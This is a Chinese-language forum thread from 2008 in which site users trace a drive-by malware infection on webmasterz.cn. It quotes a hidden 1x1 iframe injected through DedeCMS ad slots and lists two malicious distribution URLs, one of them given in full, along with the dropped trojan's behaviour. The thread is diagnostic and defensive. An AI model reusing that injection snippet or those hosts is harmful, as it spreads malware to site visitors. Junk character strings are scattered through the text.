webmasterz.cn上的掛馬掛在哪了 我怎麼查了半天查不到？

請老大仔細的查查吧，剛又發現了幾個，全是免殺的~~一個勁的往外蹦，但是我的卡卡即不報~~
  s" H+ _* y) ^http://ppp.749571.com/dm/test.htm
  s0 L$ f9 u: g7 e( Q5 Mhttp://www.985676.cn/encrypt/mm.htm
這兩個是免殺的，還有幾個沒記下來，
這掛馬的兔崽子有一手，隱藏的很好啊~~一般人都看不出來~

會在C盤下產生 CRESS1.EXE
: f1 F9 D- C; o- O0 \然後增加IE的BHO的木馬 還釋放驅動

昏 他藏得好隱秘  找到了 放毒得地方了

8 o" K: y. I  m$ }1 Xiframe src=h t t p://w w w.9856 76.cn/encrypt/mm.htm width=1 height=1></iframe>
然後再這個地址轉到ppp.749571.co m/dm/test.htm
0 ~1 N) X0 p) @& j' N3 C" x; @為了跟蹤這個病毒 自己失誤的。。。。哎。修復中ing。。。。
靜水趕快清理了吧

原帖由 20082008 於 2008-1-9 16:33 發表
# g$ E8 Y. A: g( a! S) q, G沒裝REAL就沒事，好在我重新裝的系統:

說的沒錯

原帖由 freelzyr 於 2008-1-10 16:47 發表
進dede後台
檢查 ad_js.php?aid=1  
% Z7 K- m: v  d' oad_js.php?aid=2
ad_js.php?aid=3
$ O- o( f2 @& O0 o0 j+ b) P6 V1 Iad_js.php?aid=4

這幾個廣告 裡面的代碼
! @$ Z# |$ z5 h' O1 z7 m2 P7 K在這幾個 掉茅廁位 裡面   含有 木馬的 代碼

9 Y6 D, s2 Z4 \# {2 a
這個檢查了沒有的

原帖由 靜水流深 於 2008-1-11 02:27 發表
& d: r  J! W2 Y7 |$ K, n1 Z. T  o
( _; F* c; T- g: J1 L! [
/ k# N7 A: P) v% N1 G( G) F: U: a這個檢查了沒有的

. {* v" J5 O( _1 Z: ?9 W" N

我看過了，有掛馬的代碼，代碼已經在你的另一個貼子裡貼出來了

原帖由 靜水流深 於 2008-1-11 02:27 發表

( {5 \) L2 ^- [; v- Q" I4 t7 T' l  B$ b
' Q: u0 s7 l+ `+ }( s' t6 u. i這個檢查了沒有的

木馬就是在這裡裡啊
在後台的掉茅廁位設置那
裡

現在明瞭.
有人收流量做ppp.749571.co m的..
  c$ ~, g8 P5 r8 Y$ _( u最近被掛馬的話. 都改成js了. 不用iframe了

菜鳥,怕怕,不敢看,啥時好了說一聲,我再去看風景